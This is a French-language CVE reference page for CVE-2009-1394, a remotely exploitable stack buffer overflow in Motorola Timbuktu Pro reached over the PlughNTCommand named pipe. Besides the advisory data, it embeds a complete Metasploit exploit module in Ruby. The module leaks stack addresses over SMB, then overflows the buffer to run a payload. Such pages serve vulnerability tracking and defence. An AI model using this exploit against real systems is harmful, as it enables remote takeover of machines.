CVE-2009-1394 : Détail

CVE-2009-1394

Overflow
49.01%V4
Network
2009-06-26
16h00 +00:00
2018-10-10
16h57 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Stack-based buffer overflow in Motorola Timbuktu Pro 8.6.5 on Windows allows remote attackers to execute arbitrary code by sending a long malformed string over the PlughNTCommand named pipe.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 16370

Date de publication : 2010-04-29 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # $Id: timbuktu_plughntcommand_bof.rb 9179 2010-04-30 08:40:19Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SMB def initialize(info = {}) super(update_info(info, 'Name' => 'Timbuktu <= 8.6.6 PlughNTCommand Named Pipe Buffer Overflow', 'Description' => %q{ This module exploits a stack based buffer overflow in Timbuktu Pro version <= 8.6.6 in a pretty novel way. This exploit requires two connections. The first connection is used to leak stack data using the buffer overflow to overwrite the nNumberOfBytesToWrite argument. By supplying a large value for this argument it is possible to cause Timbuktu to reply to the initial request with leaked stack data. Using this data allows for reliable exploitation of the buffer overflow vulnerability. Props to Infamous41d for helping in finding this exploitation path. The second connection utilizes the data from the data leak to accurately exploit the stack based buffer overflow vulnerability. TODO: hdm suggested using meterpreter's migration capability and restarting the process for multishot exploitation. }, 'Author' => [ 'bannedit' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9179 $', 'References' => [ [ 'CVE', '2009-1394' ], [ 'OSVDB', '55436' ], [ 'BID', '35496' ], [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=809' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 2048, }, 'Platform' => 'win', 'Targets' => [ # we use a memory leak technique to get the return address # tested on Windows XP SP2/SP3 may require a bit more testing [ 'Automatic Targeting', { # ntdll .data (a fairly reliable address) # this address should be relatively stable across platforms/SPs 'Writable' => 0x7C97B0B0 + 0x10 - 0xc } ], ], 'Privileged' => true, 'DisclosureDate' => 'Jun 25 2009', 'DefaultTarget' => 0)) end # we make two connections this code just wraps the process def smb_connection connect() smb_login() print_status("Connecting to \\\\#{datastore['RHOST']}\\PlughNTCommand named pipe") pipe = simple.create_pipe('\\PlughNTCommand') fid = pipe.file_id trans2 = simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '') return pipe end def mem_leak pipe = smb_connection() print_status("Constructing memory leak...") writable_addr = target['Writable'] buf = make_nops(114) buf[0] = "3 " # specifies the command buf[94] = [writable_addr].pack('V') # this helps us by pass some checks in the code buf[98] = [writable_addr].pack('V') buf[110] = [0x1ff8].pack('V') # number of bytes to leak pipe.write(buf) leaked = pipe.read() leaked << pipe.read() if (leaked.length < 0x1ff8) print_error("Error: we did not get back the expected amount of bytes. We got #{leaked.length} bytes") pipe.close disconnect return end offset = 0x1d64 stackaddr = leaked[offset, 4].unpack('V')[0] bufaddr = stackaddr - 0xcc8 print_status "Stack address found: stack #{sprintf("0x%x", stackaddr)} buffer #{sprintf("0x%x", bufaddr)}" print_status("Closing connection...") pipe.close disconnect return stackaddr, bufaddr end def exploit stackaddr, bufaddr = mem_leak() if (stackaddr.nil? || bufaddr.nil? ) # just to be on the safe side print_error("Error: memory leak failed") end pipe = smb_connection() buf = make_nops(1280) buf[0] = "3 " buf[94] = [bufaddr+272].pack('V') # create a fake object buf[99] = "\x00" buf[256] = [bufaddr+256].pack('V') buf[260] = [bufaddr+288].pack('V') buf[272] = "\x00" buf[512] = payload.encoded pipe.write(buf) end end

Products Mentioned

Configuraton 0

Microsoft>>Windows >> Version *

Motorola>>Timbuktu_pro >> Version 8.6.5

    Références

    http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=809
    Tags : third-party-advisory, x_refsource_IDEFENSE
    http://www.securitytracker.com/id?1022455
    Tags : vdb-entry, x_refsource_SECTRACK
    http://secunia.com/advisories/35533
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.securityfocus.com/bid/35496
    Tags : vdb-entry, x_refsource_BID